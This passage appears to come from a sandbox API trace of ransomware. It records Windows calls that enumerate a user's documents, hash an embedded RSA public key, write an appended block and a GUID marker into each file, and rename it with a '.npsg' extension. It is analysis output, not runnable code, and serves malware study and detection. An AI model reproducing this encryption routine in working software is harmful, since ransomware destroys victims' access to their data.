lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.489] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.489] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.489] CloseHandle (hObject=0x644) returned 1 [0246.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.490] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\C1atkbdfiQ5w7tOBkMk-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\c1atkbdfiq5w7tobkmk-.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\C1atkbdfiQ5w7tOBkMk-.csv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\c1atkbdfiq5w7tobkmk-.csv.npsg")) returned 1 [0246.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.491] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.492] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab7b3ef0, ftCreationTime.dwHighDateTime=0x1d5c279, ftLastAccessTime.dwLowDateTime=0x378be340, ftLastAccessTime.dwHighDateTime=0x1d5b5aa, ftLastWriteTime.dwLowDateTime=0x378be340, ftLastWriteTime.dwHighDateTime=0x1d5b5aa, nFileSizeHigh=0x0, nFileSizeLow=0x6b6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F2GDHZszFsWdo.pps", cAlternateFileName="F2GDHZ~1.PPS")) returned 1 [0246.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.493] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\F2GDHZszFsWdo.pps") returned=".pps" [0246.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\F2GDHZszFsWdo.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\f2gdhzszfswdo.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.494] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=27500) returned 1 [0246.494] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.497] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6b46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.497] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.499] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.499] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x6b6c, lpOverlapped=0x0) returned 1 [0246.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.500] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.501] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.501] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.501] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.501] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.501] GetLastError () returned 0x0 [0246.501] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.501] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.501] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.502] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.502] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6b70) returned 0x3b99d50 [0246.502] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90108 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89198 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90150 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89240 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891f8 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7b830 [0246.503] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89240 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891f8 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b891e0 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7fce8 [0246.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7fe00 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.504] GetCurrentThreadId () returned 0x5b4 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8b008 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.505] GetCurrentThreadId () returned 0x5b4 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89240 [0246.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891f8 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891c8 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89258 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0246.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89210 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89270 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89210 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89210 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891e0 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7fce8 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89270 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ff18 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b80030 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80030 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ff18 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89210 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90150 | out: hHeap=0x620000) returned 1 [0246.509] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6b6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.509] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.509] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.510] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.510] CloseHandle (hObject=0x644) returned 1 [0246.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.511] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\F2GDHZszFsWdo.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\f2gdhzszfswdo.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V 